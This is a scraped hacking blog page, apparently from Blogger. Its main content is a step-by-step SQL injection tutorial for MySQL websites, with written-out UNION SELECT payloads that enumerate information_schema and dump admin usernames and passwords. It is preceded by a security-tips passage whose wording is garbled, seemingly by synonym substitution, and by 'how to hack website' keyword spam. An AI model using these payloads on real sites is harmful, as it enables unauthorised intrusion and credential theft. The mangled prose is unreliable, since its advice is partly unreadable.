be a possible threat. These threats can modify AN assailant to own full access to your information. therefore, listen to what your users area unit uploading and scan these files before you approve it. Install security plugins for your CMS and keep them up to this point. ensure you recognize the way to assemble it properly to maximize its defense.If you engineered your own CMS/website that has AN admin login type, then don’t use the default admin name, eg: rather than “adminlogin.php”, why not decision it “something.php” etc. Test your website for any vulnerability. Use the free trial of net Vulnerability Scanner to check your website. Make sure you're mistreatment sturdy passwords and newer share them with anyone. Keep these passwords in an exceedingly safe place. It’s judicious to not store them on your PC simply just in case your PC gets hacked. Thanks For Reading this text. Hope You all like this text.Don't forget to love and share me  this wonderful article thanks <div style="background-color: white; color: #333333; font-family: lato, serif; font-size: small;">Keywords:-</div> <div style="background-color: white; color: #333333; font-family: lato, serif; font-size: 16px; line-height: 25px;"><ul style="margin: 0px; padding: 0px 0px 25px;"><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5Z1BXXpqHacr_Tx3e2_DEq30aJw_yWMSnQaVpFFL7TU8DI8gwhPbZHRBb02EzuREavB6ehqVgJWx18v_KySvoJWTMlzVKKayOZDHbdyeMRK6cHpVZMp_xVAbwICT2yQYzxmVZkfb/s1600/list.png") 0% 0% no-repeat; list-style-type: none; margin: 0px 0px 5px 20px; padding: 0px 0px 0px 15px; word-wrap: break-word;">Easy Way To Hack Website [6 methods] LATEST 2016</li><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5Z1BXXpqHacr_Tx3e2_DEq30aJw_yWMSnQaVpFFL7TU8DI8gwhPbZHRBb02EzuREavB6ehqVgJWx18v_KySvoJWTMlzVKKayOZDHbdyeMRK6cHpVZMp_xVAbwICT2yQYzxmVZkfb/s1600/list.png") 0% 0% no-repeat; list-style-type: none; margin: 0px 0px 5px 20px; padding: 0px 0px 0px 15px; word-wrap: break-word;">Website Hacking</li><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5Z1BXXpqHacr_Tx3e2_DEq30aJw_yWMSnQaVpFFL7TU8DI8gwhPbZHRBb02EzuREavB6ehqVgJWx18v_KySvoJWTMlzVKKayOZDHbdyeMRK6cHpVZMp_xVAbwICT2yQYzxmVZkfb/s1600/list.png") 0% 0% no-repeat; list-style-type: none; margin: 0px 0px 5px 20px; padding: 0px 0px 0px 15px; word-wrap: break-word;">How to hack website </li><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5Z1BXXpqHacr_Tx3e2_DEq30aJw_yWMSnQaVpFFL7TU8DI8gwhPbZHRBb02EzuREavB6ehqVgJWx18v_KySvoJWTMlzVKKayOZDHbdyeMRK6cHpVZMp_xVAbwICT2yQYzxmVZkfb/s1600/list.png") 0% 0% no-repeat; list-style-type: none; margin: 0px 0px 5px 20px; padding: 0px 0px 0px 15px; word-wrap: break-word;">website hacking</li><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5Z1BXXpqHacr_Tx3e2_DEq30aJw_yWMSnQaVpFFL7TU8DI8gwhPbZHRBb02EzuREavB6ehqVgJWx18v_KySvoJWTMlzVKKayOZDHbdyeMRK6cHpVZMp_xVAbwICT2yQYzxmVZkfb/s1600/list.png") 0% 0% no-repeat; list-style-type: none; margin: 0px 0px 5px 20px; padding: 0px 0px 0px 15px; word-wrap: break-word;">vulnerable websites hacking with havij</li><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5Z1BXXpqHacr_Tx3e2_DEq30aJw_yWMSnQaVpFFL7TU8DI8gwhPbZHRBb02EzuREavB6ehqVgJWx18v_KySvoJWTMlzVKKayOZDHbdyeMRK6cHpVZMp_xVAbwICT2yQYzxmVZkfb/s1600/list.png") 0% 0% no-repeat; list-style-type: none; margin: 0px 0px 5px 20px; padding: 0px 0px 0px 15px; word-wrap: break-word;">how to hack websites easy way in  2016.</li><li style="background: url("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5Z1BXXpqHacr_Tx3e2_DEq30aJw_yWMSnQaVpFFL7TU8DI8gwhPbZHRBb02EzuREavB6ehqVgJWx18v_KySvoJWTMlzVKKayOZDHbdyeMRK6cHpVZMp_xVAbwICT2yQYzxmVZkfb/s1600/list.png") 0% 0% no-repeat; list-style-type: none; margin: 0px 0px 5px 20px; padding: 0px 0px 0px 15px; word-wrap: break-word;">website hacking Tips And Tricks Free 2016</li></ul></div>

As per as I do know regarding hackers mind owing to my moral expertise . these days progressing to share with you all regardin...

View Post

Learn How To Hack Websites With Different Techniques

No comments:

SQL Injection in MySQL Databases:- SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial, i will be showing you the steps to carry out the attack on a MySQL Database. <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDdvNJwds1TRLk94I829nPn6ReV8v0FY-H5P7_prKJw2JLee-fkQIV9eFj0DNe5_3igb6FCEc6sbOmQ1B5PZxtOyNDxNeBZTLddyY8X8S8vyLdw2Uvkq1FAlB63elYUIciKJPSo0-mKGPW/s1600/sql_injection.gif" style="margin-left: auto; margin-right: auto;"><img alt="Learn How To Hack Websites With Different Techniques" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDdvNJwds1TRLk94I829nPn6ReV8v0FY-H5P7_prKJw2JLee-fkQIV9eFj0DNe5_3igb6FCEc6sbOmQ1B5PZxtOyNDxNeBZTLddyY8X8S8vyLdw2Uvkq1FAlB63elYUIciKJPSo0-mKGPW/s1600/sql_injection.gif" title="Learn How To Hack Websites With Different Techniques" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Learn How To Hack Websites With Different Techniques</td></tr></tbody></table> Step 1: When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this: www.site.com/page=1 or www.site.com/id=5 Basically, the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering an ' after the number in the URL. For example: www.site.com/page=1' If the database is vulnerable, the page will spit out a MySQL error such as; Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29 If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection. Step 2 Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example: www.site.com/page=1 order by 1-- http://www.site.com/page=1 order by 2-- http://www.site.com/page=1 order by 3-- http://www.site.com/page=1 order by 4-- http://www.site.com/page=1 order by 5-- If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used. Step 3 We now are going to use the "union" command to find the vulnerable columns. So we enter after the URL, union all select (number of columns)--, for example: www.site.com/page=1 union all select 1,2,3,4-- This is what we would enter if we have 4 columns. If you have 7 columns you would put, union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable. Step 4 We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands: user() database() version() or if these don't work try... @@user @@version @@database For example the url would look like: www.site.com/page=1 union all select 1,user(),version(),4-- The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83. IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this. Step 5 In this step, our aim is to list all the table names in the database. To do this we enter the following command after the URL. UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- So the url would look like: www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. Step 6 In this Step we want to list all the column names in the database, to do this we use the following command: union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- So the URL would look like this: www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user, email, and password. Step 7 Finally, we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command, union all select 1,2,group_concat(username,0x3a,password),4 from admin-- So the URL would look like this: www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin-- Here the "concat" command matches up the username with the password so you don't have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

SQL Injection in MySQL Databases :- SQL Injection attacks are code injections that exploit the database layer of the application. This is mo...

View Post

Jual DVD game HD android dan Tutorial oprek android

Jumlah Pengunjung

XPATH INJECTION TUTORIAL 2016

Easy Way To Hack Website in 2016

Learn How To Hack Websites With Different Techniques

Popular

Comments